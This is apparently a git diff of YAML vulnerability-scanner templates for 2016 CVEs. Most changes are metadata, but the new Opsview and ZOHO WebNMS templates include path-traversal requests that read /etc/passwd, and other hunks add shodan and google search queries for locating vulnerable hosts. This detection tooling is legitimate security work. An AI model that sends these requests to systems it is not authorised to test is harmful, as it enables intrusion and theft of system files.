diff --git a/cves/2016/CVE-2016-1000155.yaml b/cves/2016/CVE-2016-1000155.yaml
index dacd84369d..8b7490465c 100644
--- a/cves/2016/CVE-2016-1000155.yaml
+++ b/cves/2016/CVE-2016-1000155.yaml
@@ -1,11 +1,14 @@
 id: CVE-2016-1000155
 
 info:
-  name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: WordPress WPSOLR <=8.6 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin wpsolr-search-engine v7.6
+  description: WordPress WPSOLR 8.6 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - https://wordpress.org/plugins/wpsolr-search-engine
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=303
+    - http://web.archive.org/web/20210123180137/https://www.securityfocus.com/bid/93536/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml
index 6ada2e758e..6f283957ea 100644
--- a/cves/2016/CVE-2016-10033.yaml
+++ b/cves/2016/CVE-2016-10033.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
     - https://nvd.nist.gov/vuln/detail/CVE-2016-10033
+    - https://www.exploit-db.com/exploits/40970/
+    - https://www.exploit-db.com/exploits/40968/
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2016-10033
     cwe-id: CWE-77
-  tags: wordpress,cve,cve2016,rce
+  tags: cve,cve2016,rce,edb,wordpress
 
 requests:
   - raw:
diff --git a/cves/2016/CVE-2016-10134.yaml b/cves/2016/CVE-2016-10134.yaml
index 02d81b2500..38b1ab2065 100644
--- a/cves/2016/CVE-2016-10134.yaml
+++ b/cves/2016/CVE-2016-10134.yaml
@@ -4,16 +4,18 @@ info:
   name: Zabbix - SQL Injection
   author: princechaddha
   severity: critical
-  description: "Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks."
+  description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
     - https://nvd.nist.gov/vuln/detail/CVE-2016-10134
+    - https://support.zabbix.com/browse/ZBX-11023
+    - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850936
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2016-10134
     cwe-id: CWE-89
-  tags: cve,cve2016,zabbix,sqli
+  tags: cve,cve2016,zabbix,sqli,vulhub
 
 requests:
   - method: GET
diff --git a/cves/2016/CVE-2016-10367.yaml b/cves/2016/CVE-2016-10367.yaml
new file mode 100644
index 0000000000..8e41296b51
--- /dev/null
+++ b/cves/2016/CVE-2016-10367.yaml
@@ -0,0 +1,38 @@
+id: CVE-2016-10367
+
+info:
+  name: Opsview Monitor Pro - Local File Inclusion
+  author: 0x_akoko
+  severity: high
+  description: Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass.
+  reference:
+    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774
+    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-10367
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2016-10367
+    cwe-id: CWE-22
+  metadata:
+    shodan-query: title:"Opsview"
+    verified: "true"
+  tags: cve,cve2016,opsview,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 404
+
+# Enhanced by mp on 2022/08/03
diff --git a/cves/2016/CVE-2016-10924.yaml b/cves/2016/CVE-2016-10924.yaml
index 1806dc1462..92b0c3f941 100644
--- a/cves/2016/CVE-2016-10924.yaml
+++ b/cves/2016/CVE-2016-10924.yaml
@@ -1,20 +1,24 @@
 id: CVE-2016-10924
 
 info:
-  name: Wordpress eBook Download < 1.2 - Directory Traversal
+  name: Wordpress Zedna eBook download <1.2 - Local File Inclusion
   author: idealphase
   severity: high
-  description: The Wordpress eBook Download plugin was affected by a filedownload.php Local File Inclusion security vulnerability.
+  description: |
+    Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability.
   reference:
     - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
     - https://www.exploit-db.com/exploits/39575
     - https://nvd.nist.gov/vuln/detail/CVE-2016-10924
+    - https://wordpress.org/plugins/ebook-download/#developers
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2016-10924
     cwe-id: CWE-22
-  tags: cve,cve2021,wp-plugin,lfi,wordpress,ebook
+  metadata:
+    google-query: inurl:"/wp-content/plugins/ebook-download"
+  tags: cve,wordpress,edb,cve2016,wp-plugin,lfi,ebook,wp,wpscan
 
 requests:
   - method: GET
@@ -33,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2016/CVE-2016-10940.yaml b/cves/2016/CVE-2016-10940.yaml
index 6219d78a06..d082888437 100644
--- a/cves/2016/CVE-2016-10940.yaml
+++ b/cves/2016/CVE-2016-10940.yaml
@@ -9,12 +9,13 @@ info:
     - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6
     - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-10940
+    - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.2
     cve-id: CVE-2016-10940
     cwe-id: CWE-89
-  tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated
+  tags: wpscan,cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated
 
 requests:
   - raw:
diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml
index a62f026497..7890fd0914 100644
--- a/cves/2016/CVE-2016-10956.yaml
+++ b/cves/2016/CVE-2016-10956.yaml
@@ -1,18 +1,22 @@
 id: CVE-2016-10956
 
 info:
-  name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
+  name: WordPress Mail Masta 1.0 - Local File Inclusion
   author: daffainfo,0x240x23elu
   severity: high
-  description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
+  description: WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php.
   reference:
     - https://cxsecurity.com/issue/WLB-2016080220
     - https://wpvulndb.com/vulnerabilities/8609
+    - https://wordpress.org/plugins/mail-masta/#developers
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-10956
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2016-10956
     cwe-id: CWE-20
+  metadata:
+    google-query: inurl:"/wp-content/plugins/mail-masta"
   tags: cve,cve2016,wordpress,wp-plugin,lfi,mail
 
 requests:
@@ -31,3 +35,5 @@ requests:
         status:
           - 200
           - 500
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml
index e913b6b307..b448f10340 100644
--- a/cves/2016/CVE-2016-10960.yaml
+++ b/cves/2016/CVE-2016-10960.yaml
@@ -9,11 +9,14 @@ info:
     - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
     - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
+    - https://wordpress.org/plugins/wsecure/#developers
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2016-10960
     cwe-id: CWE-20
+  metadata:
+    google-query: inurl:"/wp-content/plugins/wsecure"
   tags: cve,cve2016,wordpress,wp-plugin,rce
 
 requests:
diff --git a/cves/2016/CVE-2016-10993.yaml b/cves/2016/CVE-2016-10993.yaml
index 3113cba0d2..6ad4301ebf 100644
--- a/cves/2016/CVE-2016-10993.yaml
+++ b/cves/2016/CVE-2016-10993.yaml
@@ -1,12 +1,13 @@
 id: CVE-2016-10993
 
 info:
-  name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: ScoreMe Theme - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter.
+  description: WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - https://www.vulnerability-lab.com/get_content.php?id=1808
+    - https://wpvulndb.com/vulnerabilities/8431
     - https://nvd.nist.gov/vuln/detail/CVE-2016-10993
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
@@ -35,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1555.yaml b/cves/2016/CVE-2016-1555.yaml
index fc3e8a3a38..a5a30ece6a 100644
--- a/cves/2016/CVE-2016-1555.yaml
+++ b/cves/2016/CVE-2016-1555.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1555
+    - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic
+    - http://seclists.org/fulldisclosure/2016/Feb/112
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2016-1555
     cwe-id: CWE-77
-  tags: netgear,rce,oast,router
+  tags: netgear,rce,oast,router,kev,seclists,cve,cve2016
 
 requests:
   - raw:
diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml
index 7f654b71ee..15ec090ed2 100644
--- a/cves/2016/CVE-2016-2004.yaml
+++ b/cves/2016/CVE-2016-2004.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/39858
     - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
+    - http://www.kb.cert.org/vuls/id/267328
+    - https://www.exploit-db.com/exploits/39858/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2016-2004
     cwe-id: CWE-306
-  tags: cve,cve2016,network,iot,hp,rce
+  tags: cve,cve2016,network,iot,hp,rce,edb
 
 network:
   - inputs:
diff --git a/cves/2016/CVE-2016-2389.yaml b/cves/2016/CVE-2016-2389.yaml
index 4a6b80e158..746f28abb2 100644
--- a/cves/2016/CVE-2016-2389.yaml
+++ b/cves/2016/CVE-2016-2389.yaml
@@ -1,19 +1,23 @@
 id: CVE-2016-2389
 
 info:
-  name: SAP xMII 15.0 - Directory Traversal
+  name: SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
+  description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
   reference:
     - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
-    - https://www.cvedetails.com/cve/CVE-2016-2389
+    - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
+    - https://www.exploit-db.com/exploits/39837/
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-2389
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2016-2389
     cwe-id: CWE-22
-  tags: cve,cve2016,lfi,sap
+  metadata:
+    shodan-query: http.favicon.hash:-266008933
+  tags: lfi,sap,packetstorm,edb,cve,cve2016
 
 requests:
   - method: GET
@@ -30,3 +34,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml
index 25be5dcc99..54b0cc875b 100644
--- a/cves/2016/CVE-2016-3081.yaml
+++ b/cves/2016/CVE-2016-3081.yaml
@@ -1,14 +1,16 @@
 id: CVE-2016-3081
 
 info:
-  name: Apache S2-032 Struts RCE
+  name: Apache S2-032 Struts - Remote Code Execution
   author: dhiyaneshDK
   severity: high
   description: |
-    Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions.
+    Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions).
   reference:
     - https://cwiki.apache.org/confluence/display/WW/S2-032
     - https://struts.apache.org/docs/s2-032.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-3081
+    - http://web.archive.org/web/20211207042547/https://securitytracker.com/id/1035665
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.1
@@ -30,3 +32,5 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2016/CVE-2016-3088.yaml b/cves/2016/CVE-2016-3088.yaml
index ba3b0c90c9..55055ec351 100644
--- a/cves/2016/CVE-2016-3088.yaml
+++ b/cves/2016/CVE-2016-3088.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2016-3088
     cwe-id: CWE-20
-  tags: fileupload,cve,cve2016,apache,activemq
+  tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive
 
 requests:
   - raw:
@@ -25,7 +25,6 @@ requests:
 
         {{randstr}}
 
-  - raw:
       - |
         GET /fileserver/test.txt HTTP/1.1
         Host: {{Hostname}}
diff --git a/cves/2016/CVE-2016-3978.yaml b/cves/2016/CVE-2016-3978.yaml
index 3477053651..eb558a9845 100644
--- a/cves/2016/CVE-2016-3978.yaml
+++ b/cves/2016/CVE-2016-3978.yaml
@@ -1,27 +1,30 @@
 id: CVE-2016-3978
 
 info:
-  name: FortiOS (Fortinet) - Open Redirect and XSS
+  name: Fortinet FortiOS  - Open Redirect/Cross-Site Scripting
   author: 0x_Akoko
   severity: medium
-  description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login."
+  description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login."
   reference:
-    - https://seclists.org/fulldisclosure/2016/Mar/68
+    - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability
     - https://nvd.nist.gov/vuln/detail/CVE-2016-3978
+    - http://seclists.org/fulldisclosure/2016/Mar/68
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-3978
     cwe-id: CWE-79
-  tags: cve,cve2016,redirect,fortinet,fortios
+  tags: cve2016,redirect,fortinet,fortios,seclists,cve
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/login?redir=http://www.example.com'
+      - '{{BaseURL}}/login?redir=http://www.interact.sh'
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'  # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'  # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-4975.yaml b/cves/2016/CVE-2016-4975.yaml
index af12271782..ad77d61eda 100644
--- a/cves/2016/CVE-2016-4975.yaml
+++ b/cves/2016/CVE-2016-4975.yaml
@@ -8,12 +8,12 @@ info:
   reference:
     - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975
     - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975
+  remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-4975
     cwe-id: CWE-93
-  remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.
   tags: cve,cve2016,crlf,generic,apache
 
 requests:
diff --git a/cves/2016/CVE-2016-4977.yaml b/cves/2016/CVE-2016-4977.yaml
index 2ec01bc852..2b7d032e7c 100644
--- a/cves/2016/CVE-2016-4977.yaml
+++ b/cves/2016/CVE-2016-4977.yaml
@@ -9,13 +9,14 @@ info:
     - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md
     - https://tanzu.vmware.com/security/cve-2016-4977
     - https://nvd.nist.gov/vuln/detail/CVE-2016-4977
+    - https://pivotal.io/security/cve-2016-4977
+  remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2016-4977
     cwe-id: CWE-19
-  remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.
-  tags: cve,cve2016,spring,oauth2,oauth,rce,ssti
+  tags: oauth2,oauth,rce,ssti,vulhub,cve,cve2016,spring
 
 requests:
   - method: GET
diff --git a/cves/2016/CVE-2016-5649.yaml b/cves/2016/CVE-2016-5649.yaml
index 1de8edc415..91a192e912 100644
--- a/cves/2016/CVE-2016-5649.yaml
+++ b/cves/2016/CVE-2016-5649.yaml
@@ -4,15 +4,17 @@ info:
   name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
   author: suman_kar
   severity: critical
-  description: "NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface."
+  description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2016-5649
+    - https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html
+    - http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2016-5649
     cwe-id: CWE-200
-  tags: cve,cve2016,iot,netgear,router
+  tags: cve,cve2016,iot,netgear,router,packetstorm
 
 requests:
   - raw:
diff --git a/cves/2016/CVE-2016-6210.yaml b/cves/2016/CVE-2016-6210.yaml
deleted file mode 100644
index 45d87300e4..0000000000
--- a/cves/2016/CVE-2016-6210.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2016-6210
-
-info:
-  name: OpenSSH username enumeration < v7.3
-  author: iamthefrogy,forgedhallpass
-  severity: medium
-  description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities.
-  reference:
-    - http://seclists.org/fulldisclosure/2016/Jul/51
-    - https://security-tracker.debian.org/tracker/CVE-2016-6210
-    - http://openwall.com/lists/oss-security/2016/08/01/2
-    - https://nvd.nist.gov/vuln/detail/CVE-2016-6210
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 5.9
-    cve-id: CVE-2016-6210
-    cwe-id: CWE-200
-  tags: cve,cve2016,network,openssh
-
-network:
-  - host:
-      - "{{Hostname}}"
-      - "{{Host}}:22"
-
-    matchers:
-      - type: regex
-        regex:
-          - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)'
-
-    extractors:
-      - type: regex
-        regex:
-          - '(?i)SSH-2.0-OpenSSH_[^\r\n]+'
\ No newline at end of file
diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml
index 71e0e92899..2d5c52ae75 100644
--- a/cves/2016/CVE-2016-6277.yaml
+++ b/cves/2016/CVE-2016-6277.yaml
@@ -1,20 +1,21 @@
 id: CVE-2016-6277
 
 info:
-  name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE
+  name: NETGEAR Routers - Remote Code Execution
   author: pikpikcu
   severity: high
-  description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before
-    1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
+  description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
   reference:
     - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-6277
+    - http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
+    - https://www.kb.cert.org/vuls/id/582384
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2016-6277
     cwe-id: CWE-352
-  tags: cve,cve2016,netgear,rce,iot
+  tags: cve,cve2016,netgear,rce,iot,kev
 
 requests:
   - method: GET
@@ -31,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2016/CVE-2016-6601.yaml b/cves/2016/CVE-2016-6601.yaml
new file mode 100644
index 0000000000..fe0fe71da5
--- /dev/null
+++ b/cves/2016/CVE-2016-6601.yaml
@@ -0,0 +1,32 @@
+id: CVE-2016-6601
+
+info:
+  name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
+  reference:
+    - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
+    - https://www.exploit-db.com/exploits/40229/
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-6601
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2016-6601
+    cwe-id: CWE-22
+  tags: edb,cve,cve2016,zoho,lfi,webnms
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2016/CVE-2016-7552.yaml b/cves/2016/CVE-2016-7552.yaml
index e7f153a0af..df8f83ffc4 100644
--- a/cves/2016/CVE-2016-7552.yaml
+++ b/cves/2016/CVE-2016-7552.yaml
@@ -4,16 +4,18 @@ info:
   name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass
   author: dwisiswant0
   severity: critical
-  description: "Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a  directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS."
+  description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a  directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
   reference:
     - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
     - https://nvd.nist.gov/vuln/detail/CVE-2016-7552
+    - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6
+    - http://web.archive.org/web/20210516181625/https://www.securityfocus.com/bid/97599
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2016-7552
     cwe-id: CWE-22
-  tags: cve,cve2016,lfi,auth,bypass
+  tags: msf,cve,cve2016,lfi,auth,bypass
 
 requests:
   - method: GET
diff --git a/cves/2016/CVE-2016-7981.yaml b/cves/2016/CVE-2016-7981.yaml
index e0dae32753..d69486f66c 100644
--- a/cves/2016/CVE-2016-7981.yaml
+++ b/cves/2016/CVE-2016-7981.yaml
@@ -1,12 +1,15 @@
 id: CVE-2016-7981
 
 info:
-  name: SPIP 3.1.2 XSS
+  name: SPIP <3.1.2 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: |
-    Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
+    SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
   reference:
+    - https://core.spip.net/projects/spip/repository/revisions/23202
+    - https://core.spip.net/projects/spip/repository/revisions/23201
+    - https://core.spip.net/projects/spip/repository/revisions/23200
     - https://nvd.nist.gov/vuln/detail/CVE-2016-7981
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -35,3 +38,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml
